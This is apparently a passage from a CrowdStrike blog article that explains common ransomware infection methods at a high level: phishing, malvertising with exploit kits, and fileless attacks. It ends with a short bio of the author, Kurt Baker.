Ransomware Infection Methods
As ransomware operators continue to evolve their tactics, it’s important to understand the most common attack vectors used so that you can effectively defend your organization.
Ransomware spreads in several different ways, but the 10 most common infection methods include:
- Social Engineering (Phishing)
- Malvertising
- Fileless Attacks
- Remote Desk Protocol
- MSPs and RMMs
- Drive-By Downloads
- Pirated Software
- Network propagation
- Malware Obfuscation
- Ransomware-as-a-Service
1. Phishing Emails Using Social Engineering
Technology and human nature are two sides of the same coin when it comes to ransomware attacks. In one case observed by CrowdStrike, a CEO’s email was spoofed and the attacker used social engineering to perform phishing attacks and trick employees into clicking a link in a fake email from the executive.
To succeed, this attack required methodical research into the company’s management, its employees and the industry. As BGH attacks increase, social engineering is becoming a more intensive presence in phishing attacks. Social media also plays a huge role, not only enabling attackers to discover information on potential victims but also as a conduit for deploying malware.
2. Malvertising and Exploit Kits
Malvertising and exploit kits can be used together to propagate ransomware that allows attackers to create “Trojan pop-ups” or advertisements containing hidden malicious code. If users click on one of them, they are surreptitiously redirected to the exploit kit’s landing page. There, a component of the exploit kit will discreetly scan the machine for vulnerabilities that the attacker can then exploit.
If the exploit kit is successful, it sends a ransomware payload to infect the host. Exploit kits are popular with eCrime organizations due to their automated nature. In addition, exploits are an efficient fileless technique, as they can be injected directly into memory without writing anything to disk, making them undetectable by traditional antivirus software.
Exploits kits are also proliferating among less sophisticated ransomware attackers, because they do not require a great deal of technical know-how to deploy. With a modest investment on the darknet, virtually anyone can get into the online ransom business.
3. Fileless Attacks
Fileless ransomware techniques are increasing. These are attacks in which the initial tactic does not result in an executable file written to the disk. Fileless ransomware uses pre-installed operating system tools, such as PowerShell or WMI, to allow the attacker to perform tasks without requiring a malicious file to be run on the compromised system. This technique is popular because fileless attacks are able to bypass most legacy AV solutions.
Kurt Baker is the senior director of product marketing for Falcon Intelligence at CrowdStrike. He has over 25 years of experience in senior leadership positions, specializing in emerging software companies. He has expertise in cyber threat intelligence, security analytics, security management and advanced threat protection. Prior to joining CrowdStrike, Baker worked in technical roles at Tripwire and had co-founded startups in markets ranging from enterprise security solutions to mobile devices. He holds a bachelor of arts degree from the University of Washington and is now based in Boston, Massachusetts.
